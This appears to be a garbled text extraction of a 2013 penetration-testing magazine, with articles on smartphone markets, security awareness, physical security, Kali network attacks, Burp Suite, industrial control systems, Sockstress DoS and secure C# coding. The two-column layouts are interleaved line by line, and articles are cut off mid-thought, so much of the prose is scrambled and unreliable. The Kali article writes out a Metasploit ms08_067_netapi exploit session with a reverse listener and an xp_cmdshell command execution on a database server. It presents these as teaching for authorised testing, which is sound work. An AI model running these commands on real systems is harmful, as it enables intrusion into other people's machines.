computing capability connectivity than a fea- similar devices like PDAs (Personal Digital Assis-
ture phone. Nowadays, phones arent just for basic tants) or Tablets.
needs like talking and texting, they have many ad- Today, a smartphone is not just used to talk;
vanced features such as: the Internet, email, gam- rather it is utilized for a wide array of services viz.,
ing, organizing, taking photos, playing music, shop- GPS, MP3 Player, a range of entertainment, elec-
ping, watching movies and more. These features tronic banking, reading e-books or attending office
combined together constitute a smartphone. The meetings online. Such a diverse mixture of servic-
building block of any smartphone is its operating es can only be delivered with the combination of
system (OS). The smartphone market is among the strong compact hardware and high-speed reliable
largest and fastest growing markets in the world of software with a good Operating System.
consumer electronics. An operating system manag-
es the hardware and software resources of smart- Smartphone Operating System
phones. It is currently dominated by the Android and Googles Android platform is expected to have the
iPhone smartphone, with BlackBerry and Symbian largest share of the global smartphone operating
Phone at a distant 3rd and 4th position. system market by 2014. Companies making An-
Nowadays, smartphones are the basic part of droid devices include Samsung, HTC, and Motor-
life for every corporate employee. They use smart- ola Mobility, which Google owns. Samsung also
phone devices to gain access to the companies cre- makes phones running Bada, which is based on
dentials and to check company specific mails and Linux. Nokia has traditionally relied on Symbian,
data. Thus, security remains a big concern at the but it is banking its future on Windows. Android
workplace. So penetration testing needs to be done and iOS have combined for 87.6% of the 2012
at every available aspect whenever it is possible. smartphone market.
As per the shipment numbers, Android had 68%
Smartphones Today market share of worldwide smartphones in Q2,
Smartphone growth and adaptation is increas- 2012 with iOS a distant second at 16.9%. Despite
ing rapidly worldwide due to their rich and versa- being down year-on-year, BlackBerry and Symbi-
Smartphone Vendor
Samsung is the undis-
puted leader in the world-
wide smartphone market.
By the end of 1Q13, Sam-
sung shipped more units
than the combined ship-
ment of the next four ven-
dors. Apple has held the
Figure 1. Global, top smartphone Operating System market share (per cent), Quarter 2, second spot in the smart-
2012 (Source: IDC Worldwide Mobile Phone Tracker, August 8, 2012) phone market. Apples mix
of models shipped to mar-
ket is increasingly diversi-
fied as it tries to reach new
buyers. LG smartphone
volume for the quarter was
driven in large part by its
3G smartphone portfolio,
namely the L series and
the Nexus 4. LTE-enabled
devices, including the Op-
timus G series, also con-
tributed to its success. LG
is anticipated to continue
its upward trajectory with
Figure 2. Global, top five smartphone vendors, unit shipments (million), Quarter 1, 2013 the launch of the F and L
(Source: IDC Worldwide Mobile Phone Tracker, April 25, 2013) series targeting the mid-
range and entry-level seg-
ments. Huawei has shown
significant improvement, it
has decreased its depen-
dence on rebranded fea-
ture phones while growing
its Ascend portfolio to ad-
dress multiple customer
segments with more brand-
ed smartphone offerings.
In 2013, ZTE focus is to
grow in North America and
Europe. In China, where
increasing price pressure
has challenged vendors
to grow profitably, ZTE will
emphasize its higher-price
Figure 3. Global, top five smartphone vendors, market share (per cent), Quarter 1, 2012 products. In addition, ZTE
(Source: IDC Worldwide Mobile Phone Tracker, April 25, 2013) will be among the first com-
SPF Console;
SPF Web based GUI;
SPF Android App;
Figure 4. Global, top five smartphone vendors, market share (per cent), Quarter 1, 2013 SPF Android Agent.
(Source: IDC Worldwide Mobile Phone Tracker, April 25, 2013)
I
nformation Technology security training is rele- It should come as no surprise that with the
vant and should be required by anyone who amount of threats in circulation consider for ex-
works in your organization that touches a com- ample, the afore mentioned number of malware
puter. End users are employees of the organiza- samples in McAfee Labs database that security
tion who utilize computers and electronic devices issues occur often.
to create, modify, or access data on your network. A rough estimate is that over 50% of security
It is safe to say that pretty much everyone in your breaches are caused by end users, either because
organization is considered an end user, to include of IT security ignorance, or by accident. These mis-
management, engineers, administrative person- takes are embarrassing, but more importantly, they
nel, even security personnel. While some users are costly to the organization.
are less concerning than others (i.e. your security Organizations often invest large sums of money
staff should all be up to speed on IT security), it is into a skilled security team, and technologies such
vital that everyone knows security best practices, as antivirus software, firewalls, Intrusion Detection/
and understands their role in organizational securi- Prevention Systems, etc. but the greatest informa-
ty. In this article, we will examine what can be done tion security risk, the end user, is often overlooked.
to ensure that end users are getting the right level Regardless of the size, complexity, or industry of
of security training to ensure that there is buy-in to an organization, if it utilizes computers or networks
IT security. in any capacity, IT security training for end users is
a necessity.
The End User Problem
According to the McAfee Threats Report: Fourth The Security Awareness Program
Quarter 2012 (McAffee Labs, 2013): The growth A security awareness program should be utilized
of malware shows a very steady curve in the past to inform end users of security risks and issues.
year. We already have more than 113 million sam- The chances of you turning all end users into se-
ples in our malware zoo, and should approach 120 curity drones may seem slim, but the better the
million next quarter. Growth in new malware by knowledge shared with them, and the increase in
quarter is also on a relatively steady, and steeper, their understanding of security concepts, will help
path. (Figure 1) to extend the security blanket of your organization.
References
Call center comics (2004). Retrieved from: http://www.callcentercomics.com/Cartoons/Information-Security.htm
Center for Information Security Awareness (n.d.). Retrieved from: http://www.cfisa.org/index.php/solutions/train-
ing-principles.html
Getting executive buy-in, CIAS (n.d.). Retrieved from: http://cias.utsa.edu/docs/TakeHome/Cyber%20Security%20Solu-
tions%20Materials/Management%20Buy-in/Getting%20Executive%20Buy-in.pdf
Information Warfare Site (n.d.). Retrieved from: http://www.iwar.org.uk/comsec/resources/sa-tools/
Manjack, M. (2006). Social engineering your employees to information security. Retrieved from: http://www.sans.
org/reading_room/whitepapers/awareness/social-engineering-employees-information-security_1686
McAffee Labs (2013). McAfee threats report: Fourth quarter 2012. Retrieved from: http://www.mcafee.com/us/resources/re-
ports/rp-quarterly-threat-q4-2012.pdf
Mitnick, K. D., Simon, W. L. (2002). The art of deception: Controlling the human element of security. Indianapolis,
IN: Wiley Publishing, Inc
Native Intelligence, Inc. (n.d.). Retrieved from: http://www.nativeintelligence.com/ni-free/awareness-slogans.asp
PJ (2010). Free Keep Calm Themed Information Security Awareness Posters: Mindful Security. Retrieved from:
http://mindfulsecurity.com/2010/10/10/free-keep-calm-themed-information-security-awareness-posters/
SecTechno (n.d.). Retrieved from: http://www.sectechno.com/2011/12/09/new-cyber-security-awareness-
campaign/?utm_source=twitterfeed&utm_medium=twitter&utm_campaign=Feed%3A+Sectechno+%28SecTechno%29
Security-Faqs.com (n.d.). Retrieved from: http://www.security-faqs.com
StaySafeOnline.org (n.d.). Retrieved from: http://www.staysafeonline.org/for-business/resources-smallmed-sized-
businesses
The Hacker News: Retrieved from: http://thehackernews.com/search/label/Security%20News
S
un Tzu, the Chinese general, strategist, and for the loss of data can be placed at the feet of the
philosopher, stated all war is deception. organisation itself, as social engineering (which
While much emphasis is placed on techno- is the close relative of those engaging in breach-
logical security solutions such as firewalls within ing physical defences), corporate culture, and bad
the IT sector, often the area of physical security physical design plays a major part in this type of
is sorely neglected. Within corporate culture, the breach. So how can an organisation harden itself
demarcation lines are frequently blurred and when against this vector?
an incident takes place there is the usual finger
pointing, allocation of blame and knee-jerk reac- Your Employees
tions. The old adage a little prevention is worth Probably the biggest risk overlooked are those
a lot of cure springs to mind here, yet sadly this who are already inside the building, complete with
important concept is frequently ignored across de- corporate security pass. Are they loyal or do they
partments, especially in large organisations. On a have ulterior motives? Then there is the human
daily basis, the lack of a security-focussed mind- factor to take into account, people genuinely want
set leaves businesses and public bodies vulner- to believe the best of others, and once inside the
able to attack, and the relatively small number of four walls of Acme Corp, subconsciously every-
incidents reenforces the illusion it could not hap- body is part of the same team. After all, Joe Bloggs
pen here. Complacency is the first enemy in this has a security pass and Human Resources/Secu-
war, and until an organisation suffers the humili- rity/Management would not have issued this un-
ation of a successful attack which has been dis- less Joe was trustworthy. As the culture swings
covered, it is often difficult to express the urgency towards more and more external contractors and
of good practice. More troubling, are the incidents roles become more specialised, the maintenance
where the perpetrator has got clean away, and the man with his head inside the switch rack or under-
only clue is where the subsequent chaos results neath the floor tiles runs little chance of being ex-
in corporate head scratching and the unanswered posed as a fraud. Worst still, are those that join the
question how could this confidential data possibly organisation with a Trojan Horse mentality, once
get out? To start with, an attacker needs a willing inside the door there are rich pickings to be had.
and cooperative victim. A lot of the responsibility Finally, there is the revengeful, those with grudg-
a d v e r t i s e m e n t
So called security locks on key safes are easy of attack can and will be exploited. However, se-
to pick (trust me on this) and most mass produced curing these areas may be outside the realm of the
desk locks, filing cabinets locks, etc. are a joke. principal we wish to protect. The principle may use
High security locks are a must, especially as the IT a well known cleaning company who has a lack of
industry has a reputation for providing poor quality security this domino effect is well demonstrated
locks that provide a reassuring sense of false secu- in the Hollywood movie Wall Street.
rity on servers, etc. Case locks on PCs and servers Serious analysis and interpretation needs to be
can be compromised by an angle grinder, bolt cut- made of the current risks, not excluding the at-
ters, or in the hands the initiated, a reasonably ef- tacker who may not intend to damage IT infra-
fective lock pick. At the end of the day, provided the structure, but manages to by fluke. Controversial
level of brute force does not cause excessive dam- businesses need to have an ear towards intelli-
age to the underlying device, a determined attacker gence, and take appropriate steps if they are un-
will be able to gain access to anything. The solu- popular or are experiencing a negative PR spike.
tion here is to use time to our advantage, having While attack is not the best form defence in these
layers upon layers of security to delay the attacker circumstances, awareness of the risks is para-
sufficiently and increase the chances of discovery mount. The political, ethical and financial temper-
so their chance of losing morale and giving up is in- ature needs to be monitored, and this metric fed
creased. The physical dimension often poses more back into the security equation.
challenges than the technological. To summarise, physical security is everyones
Businesses are stuck with their buildings, and business. While the penetration tester can dem-
the cost benefit analysis of a secure site will often onstrate weakness, ultimately a determined or
fail as the amount of investment required to bring opportunistic attacker can and will gain access
the security up to scratch will just not be available. provided their resources either physical or
This is where it is critical that the the concept of psychological exceeds that of the victim. This
security by design is introduced right at the be- means the culture of corporate complacency to-
ginning of the initial plan of where an office, data- wards risk needs to be examined, and a deep-
centre, or communications node, etc. is located. er co-operation established rather than security
The best prophylactic in these circumstances is being an afterthought. From individual employ-
the eyes and ears your employees, as once the ees, finance to HR, architects to service provid-
architecture is designed and the outer walls are ers, each brings their own vulnerabilities. Unless
breached your first line of defence has already a holistic approach is taken, closing doors after
crumbled. This includes shoulder surfing, open the horse has bolted will be the order of the day.
plan offices, poorly located data centres, etc. Once After all, an open window on the ground floor al-
the bricks and mortar have dried, it is a war of attri- lowing a thief to steal papers from a desk is just
tion securing poorly designed infrastructure. as much a vulnerability as an unsecured server or
confidential papers left on the photocopier.
Political, Financial, Environmental, and
Ethical Considerations
How seriously should your business take physi- About the Author
cal security? One would hope that a doctors of- Rob Somerville has been pas-
fice would be less vulnerable than a military instal- sionate about technology since
lation, but the obvious target would be access to his early teens. A keen advocate
drugs, confidential patient records, and identity of open systems since the mid-
theft. Few would question a man in a white coat eighties, he has worked in many
wearing a stethoscope with a branded ID in a hos- corporate sectors including fi-
pital but is that uniform genuine? The professional nance, automotive, airlines,
attacker will use every trick in the book to estab- government and media in a va-
lish a trust relationship with the victim. Uniforms, riety of roles from technical
IDs, etc. provide just enough credibility that the at- support, system administrator,
tacker is bona fide. On the other hand, the mass developer, systems integrator
recent release of data pertaining to women who and IT manager. He has moved on from CP/M and nixie
had abortions carried out in the UK demonstrates tubes but keeps a soldering iron handy just in case.
that targets most people would consider unworthy
V
ulnerability Assessment and Management tack sessions (where each individual attack session
is the core component of any security pro- is genuine but the combined attack sessions may
gram. In modern world of Software Tech- not be genuine) impose the need for a new security
nologies, where every 1000 lines of software code approach that unifies centralized analysis with the
have 40% vulnerabilities, noting is reliable, every- capability to collectively collate, analyze, and inter-
thing connected is just like a ticking bomb and vul- pret threats coming from distributed multiple attack
nerable natively. sessions and provides practical countermeasures.
Our approach to handle latest security challenges The integrated approach requires our understand-
and zero day attacks should be as proactive as are ing and attitude to handle corporate vulnerabilities
the hackers exploiting before we know them. We in centralized manner, not like traditional IT silos.
have to think ahead of hackers, we have to think This problem has been rectified by market leader
like hackers think, our approach to handle vulner- of VAM solution but not in 100%. Thanks to central-
abilities should be based on hackers look into vul- izing all of these silos under one umbrella named
nerabilities. Vulnerability Assessment and Manage- Vulnerability Assessment and Management, VAM
ment has its complete lifecycle, illustrated in Figure software suites are doing good job by providing uni-
1. Defense in-depth and 360 degree security fails fied platform, allowing generation of multiple dash-
due to flows in software, IOS and update patches, boards with relevant user groups, each having their
and our security assessment modeling. Organiza- own group of equipment and privileges to scan and
tions might have state of the start security controls manipulate their findings. This unified nature pro-
but cannot completely control the human element vides capability to consolidate all vulnerabilities and
which is the main cause of failure: humans are the to associate the Risk Management with them.
weakest link and could be easily trapped with the VAM suites still need to integrate with other areas
help of latest techniques and other social media where vulnerabilities are causing more damages,
attacks, lack of awareness of possibilities of so- such as Software Source code Analysis. Software
cial engineering attacks alerts security awareness code analysis suite scans and provides detailed
campaign to be started immediately. It should be security vulnerability information in application
the core part of Information Security Program. The code; the integration with VAM suites will allow CI-
complexity of detecting, analyzing, and countering SO to be aware of security issues in in-house de-
to emerging intrusive security threats, especially veloped software application before it moves into
those that are distributed in nature with multiple at- production environment. Further VAM needs to be
Lets assume, you have installed Kali Linux and have access to a
virtual lab or have express permission from your companys IT
manager to test your internal network. Whats next?
T
he first step in attacking a network is un- malicious RPC request. A simple way of verifying
derstanding what you are up against. This unpatched servers is to use the nmap scripting li-
phase involves mapping the discovering brary (Listing 1).
and mapping the network. Tools such as nmap Examining the nmap output shows that serv-
or unicornscan will help identify services that are er 10.0.0.5 is not vulnerable, However the serv-
available within the network. Nmap service scan er 10.0.0.6 might be vulnerable. Next, we use a
(-sV option) is very useful in identifying services Metasploit module to exploit the vulnerability
and when combined with the script scan (-sC), can
save valuable time when attacking a network. [root@kali]# msfconsole
You have done a network reconnaissance
using Nmap and other vulnerability scanners. Metasploit is invoked using the command msconsole.
Whats Next?
=[ metasploit v4.7.0-2013092501 [core:4.7
Exploitation api:1.0]
This article walks you through a few easy wins + -- --=[ 1195 exploits 726 auxiliary 200 post
which allow you to get your foothold (or full + -- --=[ 312 payloads 30 encoders 8 nops
pwange!) depending on how the internal environ- msf >
ment is configured. msf > use exploit/windows/smb/ms08_067_netapi
Nmap scan report for 10.0.0.6 msf exploit(ms08_067_netapi) > set LHOST
PORT STATE SERVICE 10.0.0.200
445/tcp open microsoft-ds LHOST => 10.0.0.200
Default Passwords
Quite often, new servers or applications get de-
ployed on systems as a part of project roll out.
System Administrators are not always updated
with the packages that application requires or in-
stalls. Many applications which provide a web-
based GUI often use application servers such
as Tomcat to process and present the informa-
tion. These applications may not be hardened by
Figure 1. Result of authenticating the server
the vendor and may be configured with default
Meterpreter>
[*] SQL Query: EXEC master..xp_cmdshell cmd.exe /c echo OWNED > C:\owned.exe
output
------
[*] Auxiliary module execution completed
Database Servers
Every organization needs database servers. The
most commonly seen servers are Oracle, MySQL,
and MS-SQL. Oracle database servers run on port
1521/TCP commonly. Oracle database servers 9
and lower by default do not have a listener pass-
word set and allow enumerating the service identifi-
ers (SID). In order to connect to database server you
need to specify the SID. In Oracle 10g and onwards
this is not the case. When trying SID enum against [ GEEKED AT BIRTH ]
a 10g+ server we see the following response
T
he most common web application security Its various tools work seamlessly together to
weakness is the failure to properly validate support the entire testing process, from initial
input coming from the client or environment mapping and analysis of an applications at-
before using it. This weakness leads to almost all tack surface, through to finding and exploiting
the major vulnerabilities in web applications, like security vulnerabilities.
cross site scripting, SQL injection, interpreter injec- Burp Suite contains many key features:
tion, locale/Unicode attacks, file system attacks,
and buffer overflows. Data from an external entity An intercepting proxy, which lets you inspect
or client should never be trusted, since it can be and modify traffic between your browser and
arbitrarily tampered with by an attacker. Accept the target application.
known good and reject known bad, this technique An application-aware spider, for crawling con-
must be followed. That is rule number one. Unfor- tent and functionality.
tunately, complex applications often have a large An advanced web application scanner, for au-
number of entry points, which makes it difficult for tomating the detection of numerous types of
a developer to enforce this rule. I will describe lat- vulnerability.
est tools and techniques that will evaluate the se- An intruder tool, for performing powerful cus-
curity issues into web applications. tomized attacks to find and exploit unusual vul-
nerabilities.
There are lots of open source and paid web A repeater tool, for manipulating and resending
application auditing frameworks. individual requests.
Top 5 tools will be discussed here that I per- A sequencer tool, for testing the randomness
sonally use for pentesting. of session tokens.
The ability to save your work and resume
At first, one of my favorite tools for auditing web working later.
applications is Burp Suite from Port swigger. Extensibility, allowing you to easily write your
Burp Suite is an integrated platform for per- own plug-ins, to perform complex and highly
forming security testing of web applications. customized tasks within Burp.
T
he topic of assessing security/hacking in- tions will include type specific items to remember
dustrial control system has been the sub- when setting security assessment scope.
ject of many papers, books and articles.
The goal of this article is not to redo any of these Usage
writings, as they provide a great introduction in Industrial control systems are used by various in-
the field (although part of these writings are sim- dustries, including water, electrical, utilities and oil
ply hype so evaluate critically). But even with all and gas. The applications of industrial control sys-
the resources available, it is common for security tems include nuclear reactors, chemical plants,
professionals to reduce industrial control systems substations, cranes, assembly lines, and many
to SCADA, which is incorrect. This article aims others. Other lesser known applications include lo-
to help the reader to better understand industri- gistics, manufacturing and shipping (yes, ships).
al control systems by describing two important Various forms of industrial control systems exist.
types: DCS and SCADA. In addition it will provide Depending on the application one form of indus-
key items to consider when setting scope of in- trial control system may be chosen over another,
dustrial control systems security assessment. In but the principle remains the same: controlling a
order to fully benefit from this article, some prior process through measuring process variables and
experience in assessing security within the office- adjusting parameters if needed.
IT domain is necessary. The reason for automating differs per instance,
In this article first a background on industrial but is typically meant to enhance process efficien-
control systems usage and application will be pro- cy, ensure a constant quality, reduce cost or health
vided, followed by a fictitious example of process and safety risks, or a combination of these. The
control, a brief description of information exchange degree to which automation has been achieved,
with other systems, and items to keep in mind however, varies per instance. Control is achieved
when setting scope of a security assessment on by embedding various types of instruments (sen-
any industrial control system. After this, the distrib- sors and control elements also called actuators)
uted control system and SCADA specific types of into the process. These instruments measure pro-
industrial control systems will be described. Both cess variables by some form of physical quantity,
distributed control system and SCADA descrip- such as mass, temperature etc. The measurement
Figure 1. Example process Liquid receiving tank having instruments to monitor level (high and low) and temperature,
discharged by bottom valve
T
he most important enhancement made to File System
the OS by the programmers at Berkeley was File system is a logical collection of a file and direc-
adding networking capability. This enabled tory on a partition or a disk. It has a root directory,
the OS to operate in a local area network (LAN). which further contains all files and directories in an
In 1988, AT&T UNIX, BSD UNIX, and other UNIX operating system. The root directory is identified
OSs were folded into what became System V re- as /. Each file or directory is identified by its name
lease 4 (SVR4) UNIX. This was a new generation and a unique identifier known as Inode number.
OS, which became an industry standard. The new
SVR4 UNIX became the basis for not only Sun and
AT&T versions of the UNIX environment, but also
IBMs AIX and Hewlett-Packards HP-UX.
UNIX was constructed with following mecha-
nism:
Kernel
Kernel is the core/heart of OS and responsible for
all the processing in computer. It manages all the
physical resources of the computer including file-
systems, CPU, memory, etc.
Figure 1. Directory structure
Shell
Shell is a command interpreter and act as an in- Process
terface between the system and the user. Shell Every program you run or execute in UNIX/Linux
accepts the command and pass is to the ker- creates a process. When you log in to the system
nel, which further executes the command. In Or- and start the shell. Several processes will be start-
acle Solaris 11 and Oracle Enterprise Linux the ed, depending on the associated programs in login
default shell is bourn again shell, which is also shell. Whenever you execute in command in the
known as bash. shell, it will start a process. And a process can fur-
Figure 3. Centos
Figure 4. Oracle Solaris 11 Desktop Menu Installing Oracle Solaris 11 inside a Virtual
Machine with Live CD
The easiest way to start using Oracle Solaris 11 is
to install it into a virtual machine on top of host op-
erating system running on physical machine. Fig-
ure below shows Oracle Solaris 11 installed on Ap-
ple OS X using Oracle VM Virtual Box.
Oracle Solaris 11 will recognize the virtualized
devices that the virtual machine provides. If you
run Oracle Solaris 11 in full-screen mode, you
might actually forget that theres another operating
system running behind.
The one drawback to this approach is that
you need enough memory to run two operat-
ing systems simultaneously a minimum of
2 GB is recommended for good performance.
You should also allow a minimum of 7 GB of
disk space to install the operating system in
Figure 5. Terminal window
virtual machine.
A Denial of Service
Primer via Sockstress
Effective. Efficient. Lean and Mean. These words can all be used
to describe Sockstress: a type of Denial of Service attack that
zeroes right in via TCP to wreak havoc on large or small systems.
The idea behind Sockstress is simple: where there is a TCP stack,
there is inherent vulnerability. In this article we are going to
examine a bit of the history of this interesting attack and explore
its more recent use.
W
e will also describe our execution of the Often denial of service attacks are associated
attack that was set up in a laboratory en- with overwhelming the bandwidth capabilities of
vironment to measure the effectiveness websites in order to bring them down and this is
of this as a Denial of Service (DoS) attack tool. still a popular option. Usually this type of attack
must rely on connections made by many differ-
The DoS-Sockstress Connection ent machines that are typically members of bot-
One of the most popular types of attack on infor- nets. This is known as a Distributed Denial of
mation systems is a Denial of Service attack, which Service, or DDoS attack. Sockstress, on the oth-
may take on any number of vectors and guises. er hand, does not require tremendous amounts
An attacker may want to reduce or completely de- of bandwidth to do its job. It also does not need
ny service indefinitely, or just cause some level of to have thousands of computers making connec-
grief at the target. Many DoS options are available tions in order for it to be successful. Depending
to the attacker; some have been around for a while on the number of connections made to the end
and have generally been mitigated, though new point service, the attack may render its destruc-
ones do emerge periodically. tive force quickly to smaller websites which do
Sockstress is a denial of service attack that was not have the luxury of load balancing across a
announced in 2008 and which comes in half a doz- number of servers.
en varieties. As with other vulnerabilities, Sock-
stress capitalizes on abusing functionality of ex- Not Your Typical DoS Attack
isting technology in a way that was not originally Denial of Service attacks still pop onto the ra-
intended. Although this particular attack has been dar of service providers periodically just when
well known and documented for some time it still service usage is expected to be high. As an ex-
has the ability to cause trouble in large or small ample, sporting events and gambling go hand in
systems. In order to really understand how this at- hand, and give a terrific example of when DoS
tack works, a small laboratory system is going to or DDoS attacks are going to happen. Attackers
be subjected to Sockstress in order to show a pro- know when websites that have anything to do
gression of the effects of the attack so that it can with these events are going to experience high
be thoroughly understood. usage well ahead of time and can plan accord-
Secure Coding
in C# .NET
As all of us programmers go day by day, writing more and more
code, improving whats already written and developing new and
improved code, we devote our time and effort to writing software
that will do the work for us and for our customers. As the industry
relays on speed and efficiency, we put great effort in optimizing
performance, creating eye-appealing and stylish GUI (Graphical
User Interface), and use state-of-the-art technology to attract as
many buyers for our products.
H
owever, even though the above is impor- Confidentiality prevents sensitive information
tant, at times there is a concept that is of- from reaching the wrong people, while making
ten disregarded and overlooked, Secure sure that the right people can in fact get it. A
Code writing. good example is an account number or routing
As the name implies, Secure Coding refers to the number when banking online. Data encryption
idea that software almost always contains flaws is a common method of ensuring confidential-
in either the design, or the internal functions that ity. User IDs and passwords constitute a stan-
could lead to security breaches and be exploited dard procedure; two-factor authentication is
by hackers and crackers. becoming the norm and biometric verification
Now, the magnitude of such a thing can be mini- is an option as well. In addition, users can take
mal to catastrophic in terms of the damage that is precautions to minimize the number of places
done. where the information appears, and the num-
In other words, we can consider severity of dam- ber of times it is actually transmitted to com-
age as the effect that is caused upon exploitation. plete a required transaction.
Does the damage apply just for the user, or are Integrity involves maintaining the consistency,
others being affected by it, or can it bring down an accuracy, and trustworthiness of data over its
entire enterprise? Even though it might seem odd entire life cycle. Data must not be changed in
that computer software can take down an entire transit, and steps must be taken to ensure that
enterprise, we need to remember that a lot of to- data cannot be altered by unauthorized people
days day to day businesses and activities are do- (for example, in a breach of confidentiality). In
ne using computers, such as e-commerce, online addition, some means must be in place to de-
banking, cloud services, etc. tect any changes in data that might occur as a
Its important to note that secure programming result of non-human-caused events such as an
applies to all programming languages. electromagnetic pulse (EMP) or server crash. If
Some issues that are addressed by security are an unexpected change occurs, a backup copy
confidentiality, integrity, and availability (CIA) (Tak- must be available to restore the affected data
en from Whatis.com) to its correct state.
Writing type-safe code: To enable the code to Figure 2. Generic Identity example
benefit from code access security, we must
use a compiler that generates verifiably type- Principle (MSDN)
safe code. A principal represents the identity and role of a us-
Imperative and declarative syntax: Interaction er and acts on the users behalf. Role-based secu-
with the runtime security system is performed rity in the .NET Framework supports three kinds of
using imperative and declarative security calls. principals:
Declarative calls are performed using attributes;
imperative calls are performed using new in- Generic principals represent users and roles
stances of classes within your code. Some calls that exist independent of Windows NT and
can be performed only imperatively, while oth- Windows 2000 users and roles.
ers can be performed only declaratively. Some Windows principals represent Windows us-
calls can be performed in either manner. ers and their roles (or their Windows NT and
Requesting permissions for our code: Re- Windows 2000 groups). A Windows principal
quests are applied to the assembly scope, can impersonate another user, which means
where your code informs the runtime about the principal can access a resource on a us-
permissions that it either needs to run or spe- ers behalf while presenting the identity that be-
cifically does not want to. Security requests longs to that user.
are evaluated by the runtime when our code Custom principals can be defined by an appli-
is loaded into memory. Requests cannot influ- cation in any way that is needed for that partic-
ence the runtime to give our code more per- ular application. They can extend the basic no-
missions than the runtime would have giv- tion of the principals identity and roles.
en your code had the request not been made.
However, requests are what your code uses to Principal Objects
inform the runtime about the permissions it re- Principal Objects are used for representing the Se-
quires in order to run. curity Context under which the code is running, in-
Using secure class libraries: Our class libraries tegrating with the identity objects to decide who is
use code access security to specify the per- allowed to run what.
missions they require in order to be accessed. The .NET provides a GenericPrincipal object
We should be aware of the permissions re- and a WindowsPrincipal object.
quired to access any library that our code uses The IPrincipal interface defines access to its as-
and make appropriate requests in our code. sociated Identity object as well as a method to deter-
mine if the user that is identified as a role member.
Principle, Identity Objects and Evidence For instance, whether the user david is a mem-
Identity Objects ber of accounting role.
Identity Objects are used to encapsulate informa- A role that is able to use functionality for updat-
tion about the user or entity being validated. ing the DB.
Code Signing
Code signing is the method of using a certifi-
cate-based digital signature to digitally sign exe-
cutables, DLLs, and scripts in order to verify the
Figure 7. Signingtool.exe Example
sources identity to ensure that the code has not
been changed or corrupted since it was signed by Digital Certificates
the source.
This helps us and our applications to determine
whether the software can be trusted for execution
(Figure 6).
Conclusion
As you can see, C# and the .NET frame-
work provide lots of easy-to-use, easy-to-
understand and easy-to-manage sets of
classes, tools, and functions.
However, there are still a lot more to
.NET than these examples and a lot more
to learn and use when building security-
aware applications and softwares.
I believe that MSDN and other websites
are a great source of information, but it
is important to first understand how stuff
works, what is its purpose, and how to in-
tegrate it, than just copy and paste into
our code.
Dont forget, after all this, we still need
to make sure that the code can actually
run, and not overload it with overheads.
I hope that its been informative for you,
and Id like to thank you for reading!
Gilad Ofir
Has years of experience as a System Adminis-
trator and Integrator, he have been working
mostly with Windows OS and Linux OS, work-
ing with many AD environments, integrated
with other Microsoft-related products. Com-
puter Programmer, best at C# language. He
is Informa-tion Security Consultant at Defen-
sia Company now, advising customers in In-
formation Security related issued, pentesting,
vulnerability assessment, code review and
many more.
TBO 03/2013
BONUS
I
know what you are saying to yourself. This is The Form
my Amazon server instance, I can scan it if I Amazons electronic form will require you to fill in the
want! Yes, even if you are a 3rd party tester, exact instance(s) you would like to test, Source and
you do have the right to scan a customer Amazon Destination IP Address(s), along with the date range
server instance if you go about it the right way. you would like to perform your scan on. You will also
The right way does not permit testing of m1.small need your AWS Account Number which automatical-
or t1.micro instance types due to potential ad- ly pre-populates on the form when you logon to your
verse performance impacts of customers you may AWS account. To submit the form you also have to
be sharing resources with. For all other instance agree to the Terms and Conditions of this penetra-
types, Amazon requires its customers to obtain tion test. Conditions, who cares? I never read them
permission to conduct penetration tests. Dont be and always click accept. In this case, Im strongly
scared. This is a very simple process and I will advising you to read the Terms and Conditions spe-
walk you through it. cifically regarding the appropriate tools for the test.
Amazon strictly forbids utilizing your pentest tools
Handling the Paperwork to perform a (DoS) Denial-of-Service attack even to
Amazon requires you to fill out the AWS Vulner- your own instances. They specifically mention pro-
ability / Penetration Testing Request Form to be- hibiting Protocol flooding (SYN flooding, IMCP flood-
gin the penetration testing approval process. They ing, UDP flooding) and resource request flooding
recommend that the customer themselves should (HTTP request flooding, Login request flooding, API
fill this form and then let their 3rd party know of request flooding). Amazon will hold you responsible
the approval status. As most of us know, the cus- for any damages to AWS or any AWS customers im-
tomer hired you for a reason and they want to do pacted by your penetration activities so please be
as little as possible. That being said, I recommend careful! Amazon is huge and they have more law-
setting up a remote screen sharing session and yers then you. After submitting the Amazon Penetra-
walking your customer through this process. They tion Testing Request form, you or your customer will
will need to be logged into the Amazon AWS Portal receive a response from Amazon from an actual hu-
using the credentials associated with the instances man being within one business day at least letting
you wish to test. you know they received your request.
TBO 03/2013
BONUS
some lame business impact reason that suddenly {
popped up? Yes, that does happen all the time. You Statement: [
go through days of planning and all of a sudden the {
business tells you to delay your project. If this hap- Action: ec2:DescribeInstances,
pens to you dont worry. All you have to do is reply Effect: Allow,
to the Amazon authorization e-mail and ask to ex- Resource: *
tend your testing period to the new date. Remem- }
ber, you cant perform the test outside of your date ]
range without first asking for this extension. }
Figure 5. URLInput
Figure 7. TestStatus
Keep on Scanning
Every good pentester knows that its always a good
idea to use multiple tools to perform your tests to
increase your results.
A BZ Media Event
U P D AT E
NOW WITH
STIG
AUDITING
IN SOME CASES
nipper studio
HAS VIRTUALLY
REMOVED
the
NEED FOR a
MANUAL AUDIT
CISCO SYSTEMS INC.
Titanias award winning Nipper Studio configuration
auditing tool is helping security consultants and end-
user organizations worldwide improve their network
security. Its reports are more detailed than those typically
produced by scanners, enabling you to maintain a higher
level of vulnerability analysis in the intervals between
penetration tests.
www.titania.com